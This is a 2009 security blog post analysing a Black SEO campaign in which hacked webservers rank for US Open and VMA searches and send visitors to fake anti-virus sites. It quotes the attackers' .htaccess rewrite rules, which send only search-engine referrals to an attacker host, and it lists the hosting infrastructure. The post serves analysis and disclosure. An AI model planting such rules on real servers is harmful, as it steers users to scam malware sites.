Monday, September 14, 2009

US Open and Video Music Awards top rogue anti-virus efforts

Saturday night I got an email from Brian Tanner, the leader of our UAB Malware Analysis team. Brian plays a bit of tennis, and was doing a search for the "US Open Finals Schedule" in Google, when he noticed some strange links in the top ten results. He wrote me a note to tell me that for some reason "" and "" were both showing up as top sites on Google for his search, but when he tried to follow either link, it took him to a fake anti-virus product instead.

After a little digging Monday morning, and with some helpful pointers from some fellow researchers, it looks like we have a fairly complete story of what's going on here.

On one level, we start with the fact that several webservers have been hacked, and loaded up with extremely powerful Search Engine Optimization terms, what we call "Black SEO" in the community. In this case, the hackers have searched some news sites for their top headlines, and then repeated the search with those headlines as the search terms to pull other related headlines. Then they've created webpages which are loaded with all of those headlines. That's how they are getting into the top searches. By doing some searches with "inurl" and "site" tags on Google, we're able to pull a pretty complete list of the headlines which are being seeded by this Black SEO technique.

For example, here are four sites which are coming up regularly in the searches, with whatever string we are looking for showing up after the question mark in the URL:

Just as an example, I did the Google search:

inurl:look US Open

and received 210 results, including:

Us Open Mens Final 2009
Us Open Final Schedule
Us Open 2009 Mens Final
Us Open Womens Final 2009
Us Open Final 2009
Roger Federer Us Open
Serena Williams Outburst Transcript
Us Open Final
You Tube Serena Wililams
Serena Williams Outburst What Did She Say
Serena Williams Outburst Video

Then I did the same search, without the "US Open" to learn what other headlines this Black SEO technique was trying to capture, and found these headlines:

Tory Shulman
ESPN Boston
Roger Federer US Open
Megan Fox Thumb Pictures
Avaya Nortel
Chicago Bears 2009 schedule
Megan Fox VMA
Beyonce Twitter
VMA Outfits
New Moon Trailer 3 Leaked
Kay Perry Vma Dress
Lil Mama Vma
Kim Clijsters Baby
This is it
Music Awards Taylor Swift
Federer Between the Legs
Beyonce Vma 2009
Defying Gravity Cancelled
Jawbone 2 Review
The Ruins MTV
Bears vs Packers
Lauren London Baby
Lauren London Baby Pictures
Pink Vmas

Students kindly informed me what VMAs are - apparently some people like watching music videos so much they have their own awards show, the Video Music Awards. Most of the top hits in the resulting headlines (more than 1,000 of them) from were either for the VMAs or the US Open.

Some other sites, that we aren't going to dig into as deeply, include:

First, I'd like to acknowledge a pair of great blog articles from the Unmask Parasites Blog:
Unmasking the Antivirus 2009 .htaccess Exploit
Bogus Antivirus 2009 .htaccess Exploit.

The "guts of it" are that the Apache .htaccess includes:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://(BadSiteHere) [R,L]

What this means is that if I visit the webpage by accessing it directly, I see the webpage. But if I visit the page after having been referred by a search engine, I get sent to the hacker's page instead.

Currently the main websites that websearchers are landing on are:


#1. is hosted on the IP addresses and

Some of the live sites also hosted on include:

Several of those domains, including
are also hosted on the IP address,, which also
hosts the following domains:

#2. was hosted on, a Canadian-based address belonging to Velcom, a customer of TATA Communications (AS6453).

That ip is also hosting:

#3 was hosted on, also Velcom.

That IP is also hosting:

#4. was hosted on, an Israeli based address belonging to "Loads Internet Solutions", a customer of (AS1680). How bold can they be? "Loading" is the term criminals use for the merchandising and monetizing of botnets by using them to download other people's malware. "Loads" are the malware someone else pays you to put on your botnet.

That IP is also hosting:

#5. was also a VELCOM IP address,

That IP address was used to host:

Gee . . . at this point I'm tempted to scan this whole Class C ( and see what other forms of badness reside there . . . Sadly, Velcom's phone number listed in their IP whois data has been disconnected or is not in service. We went ahead and called their upstream, who asked us to send them an email. Hello, TataCommunications! I hope you read this! Thank you for your help!

Here's some I found on IPs through

And here are some nameservers from the same range . . .

No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.